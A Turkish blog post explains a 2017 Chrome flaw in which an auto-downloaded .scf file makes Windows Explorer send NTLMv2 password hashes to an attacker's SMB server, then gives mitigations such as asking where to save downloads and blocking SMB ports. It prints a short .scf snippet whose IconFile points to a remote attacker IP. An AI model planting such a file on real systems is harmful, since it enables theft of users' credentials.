Chrome kullanıcılarının bilgileri büyük risk altında


chromede smb acigi
2017 yılına girdiğimizden beridir bir güvenlik açığı patlaması yaşıyoruz daha geçenlerde sordum.net olarak sizlere 3 oldukça ciddi güvenlik açığı hakkında bilgiler aktarmıştık hemen ardından defensecode web

sitesinde (buradaki linkten ulaşabilirsiniz) Chrome kullanıcılarının windows kimlik bilgilerinin nasıl kolayca ele geçirilebileceğinin ayrıntıları paylaşıldı ve ne gariptirki halen dünyanın çeşitli ülkelerinde etkisini sürdüren WannaCry virüsün faydalandığı açığın benzerinden faydalanılıyor (SMB dosya paylaşım protokolü).

Chrome tarayıcısı şu anda masaüstü cihazlarda en popüler tarayıcıdır ve varsayılan olarak güvenli dosyaları otomatik olarak (kullanıcıya bildirmeden) indirecek şekilde dizayn edilmiştir işte saldırı da tam bu noktada ortaya çıkıyor gelelim saldırının anatomisine :
Kurbanın Microsoft LAN Manager (NTLMv2) Parola Hash değerini ele geçirmek için saldırgan tarafından kontrol edilen uzak SMB sunucusu kullanılarak hedefteki chrome kullanıcısına bir Windows Explorer Shell Command File (.scf) dosyası indirtiliyor bu dosya Windows 98 den beridir varolan ve genellikle masaüstünü göster kısayolu olarak kullanılan bir dosyadır örneğin

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

Bu kod kolaylıkla uzak bir sunucudan Kimlik denetimi doğrulaması için değiştirilebiliyor

[Shell]
IconFile=\\170.170.170.170\icon

.sfc dosyası Temel olarak iki bölümden oluşan bir metin dosyasıdır; biri çalıştırılacak bir komutu belirlemek ve diğeri simge dosyasının konumunu belirtmek için kullanılır , Üstteki gibi bir kodda Windows Dosya Gezgini otomatik olarak “icon” dosyasını uzak sunucudan indirecektir inen dosyanın çalışması için tıklanmasına veya açılmaya çalışılmasına bile gerek yok çünkü Windows gezgini bu inen dosyaları otomatik olarak çalıştıracaktır. işin daha da ilginci bu dosyaların Windows gezgini altında uzantıslarının görünmemesidir

Google Chromenin burada suçu nedir ?

Chrome, SCF dosyalarının güvenli olduğunu düşünüyor ve otomatik olarak indirilmelerine izin veriyor oysaki İnternet explorer , Microsoft EDGE , Firefox ve Safari gibi rakip tarayıcılar, SCF dosyalarının otomatik olarak indirilmesine müsade etmiyor. Chromenin bu davranışı güvenlik riski oluşturuyor ve bu sebeplede Bir SMB sunucusunun arkasındaki saldırganlar Windows şifre hash değerlerini kolayca ele geçirebiliyorlar .

Saldırı nasıl gerçekleşiyor ?

chrome otomatik indirme açığı

Windows kullanıcısı bir web sayfasını ziyaret ettiğinde geriplanda bu sfc dosyası otomatik olarak iniyor veya kullanıcı biryere tıkladığında indirtiliyor , kullanıcı varsayılan indirilenler klasörünü açtığında Windows ikon konumunu kontrol ediyor ve saldırganların elindeki SMB servere Windows kimlik bilgilerinin HASH değerlerini gönderiyor ve ele geçirilern bu şifreler saldırganlar tarafından kırılıyor , bunların kırılmaları ise sadece çok karmaşıklarsa zor görünüyor. Son yıllarda Şifre kırmada GPU ların kullanılması ile işler daha da hızlandı mesela Tek bir Nvidia GTX 1080 kartı için NetNTLMv2 hashcat kıyaslaması yaklaşık 1600 MH / s’dir yani : Saniyede 1,6 milyar hash anlamına gelir ki bu kartladan 4 tanesi ile ; 8 karakterli , Büyük küçük harfler ve özel karakterlerin (! @ # $% &) kullanıldığı bir şifreyi bulmak 1 gün bile sürmemektedir.

chrome indirme açığını kapatalım

Bu açık eğer Windowsunuza Microsoft hesabı ile giriş yapıyorsanız daha da tehlikeli bir hal almaktadır çünkü saldırganlar Outlook, OneDrive veya Office365 gibi online hizmetlerinizin hepsini ele geçireceklerdir. Şuanda Antivirüslerin hiçbirisi bu türden uzak sunucudan inen dosyaları zararlı olarak görmüyor. Google Bu açığı kapatmak için çalışmalar yapıyor olsada kendimizin alabileceği bir önlem mevcut :

1. Chromenin Sağ üst köşedeki üç noktaya tıklayalım ve Ayarlar diyelim
2. Açılan ekranın dip kısmında “gelişmiş ayarları Göster” kısmına tıklayalım
3. İndirlenler kısmında “İndirmeden önce her dosyanın nereye kaydedileceğini sor” kısmına tik koyalım. (Zaten tik varsa korunuyorsunuz demektir)

chroem indirilenler smb açığı

hernekadar bu işlemlerden sonra Chromenin indirme mekanizmasına bir koruma katmanı eklemiş olsakta , manipüle edilmiş SCF dosyaları hedef sistemlere farklı yollarla indirtilebilir bu sebeple güvenlik risklerini azaltmak amacıyla SMB trafiğinin kullandığı bağlantı noktalarının portları windows güvenlik duvarından engellenebilir Microsoftun bu konuda Buradaki makalesine göre SMB ports 137, 138, 139 ve 445 numaralı portların hertür iletişim ve internet erişimine kapatılmaları gerekmektedir. Bu portların kapatılması , Faks hizmeti, yazdırma biriktiricisi, net oturum açma veya dosya ve yazdırma paylaşımı gibi diğer windows hizmetlerinde aksamalara sebep olabilir , eğer butür hizmetleri kullanmıyorsanız Program ekle kaldır penceresindeki “Windows özelliklerini aç veya kapat” kısmını açıp

SMB 1.0 açığını kapatmak

Burada yeralan SMB 1.0/CIFS dosya paylaşım desteği kısmının tikini kaldırıp açığı kapatabilirsiniz. ilaveten bakınız 3 Güncel güvenlik açığı Burada


4 Yorum Var

Yorum Ekle

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Captcha